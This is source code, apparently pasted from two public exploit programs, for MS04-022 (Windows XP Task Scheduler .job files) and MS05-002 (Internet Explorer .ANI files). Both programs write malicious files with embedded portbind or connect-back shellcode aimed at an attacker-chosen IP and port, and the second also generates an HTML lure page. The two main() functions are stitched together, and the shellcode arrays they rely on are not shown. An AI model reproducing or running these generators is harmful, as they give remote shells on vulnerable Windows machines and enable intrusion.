int main(int argc, char **argv) { unsigned short strlen; unsigned short port; unsigned long ip, sc; FILE *fp, *fp2; printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n"); printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); if (argc < 4) usage(argv[0]); sc = atoi(argv[2]); if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]); fp = fopen(argv[1], "wb"); if (fp == NULL) { printf("[-] error: can\'t create file: %s\n", argv[1]); exit(0); } /* header & garbage */ fwrite(jobfile, 1, sizeof(jobfile)-1, fp); fseek(fp, 39*16, SEEK_SET); port = atoi(argv[3]); printf("[*] Shellcode: "); if (sc == 1) { SET_PORTBIND_PORT(portbindsc, htons(port)); printf("Portbind, port = %u\n", port); fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp); fwrite(endofjob, 1, 4, fp); fseek(fp, 70, SEEK_SET); /* calculate length (see header) */ strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2; } else { ip = inet_addr(argv[4]); SET_CONNECTBACK_IP(connectbacksc, ip); SET_CONNECTBACK_PORT(connectbacksc, htons(port)); printf("Connectback, port = %u, IP = %s\n", port, argv[4]); fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp); fwrite(endofjob, 1, 4, fp); fseek(fp, 70, SEEK_SET); /* calculate length (see header) */ strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2; } printf("[*] Generate file: %s\n", argv[1]); fwrite(&strlen, 1, 2, fp); fclose(fp); return 0; }
int main(int argc, char **argv) { FILE *fp; unsigned short port; unsigned long backip = 0; unsigned char f[256+5] = ""; unsigned char anib[912] = ""; printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n"); printf("\tCopyright (c) 2004-2005 :: WhiskyCoders :: \n\n\n"); printf("Tested on all affected systems:\n"); printf(" [+] Windows Server 2003\n [+] Windows XP SP1, SP0\n"); printf(" [+] Windows 2000 All SP\n\n"); printf("%s\n\n", discl); if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) { printf("[-] Size of shellcode must be <= 686 bytes\n"); return 0; } if (argc < 3) usage(argv[0]); if (strlen(argv[1]) > 256) { printf("[-] Size of filename must be <=256 bytes\n"); return 0; } /* creating ani file */ strcpy(f, argv[1]); strcat(f, ".ani"); printf("[*] Creating %s file ...", f); fp = fopen(f, "wb"); if (fp == NULL) { printf("\n[-] error: can\'t create file: %s\n", f); return 0; } memset(anib, 0x90, 912); /* header */ memcpy(anib, aniheader, sizeof(aniheader)-1); /* shellcode */ port = atoi(argv[2]); SET_CONNECTBACK_PORT(shellcode, fixx(port)); backip = inet_addr(argv[3]); SET_CONNECTBACK_IP(shellcode, backip); memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1); fwrite(anib, 1, 912, fp); printf(" Ok\n"); fclose(fp); /* creating html file */ f[0] = '\0'; strcpy(f, argv[1]); strcat(f, ".html"); printf("[*] Creating %s file ...", f); fp = fopen(f, "wb"); if (fp == NULL) { printf("\n[-] error: can\'t create file: %s\n", f); return 0; } sprintf(anib, html, discl, argv[1]); fwrite(anib, 1, strlen(anib), fp); printf(" Ok\n"); fclose(fp); return 0; }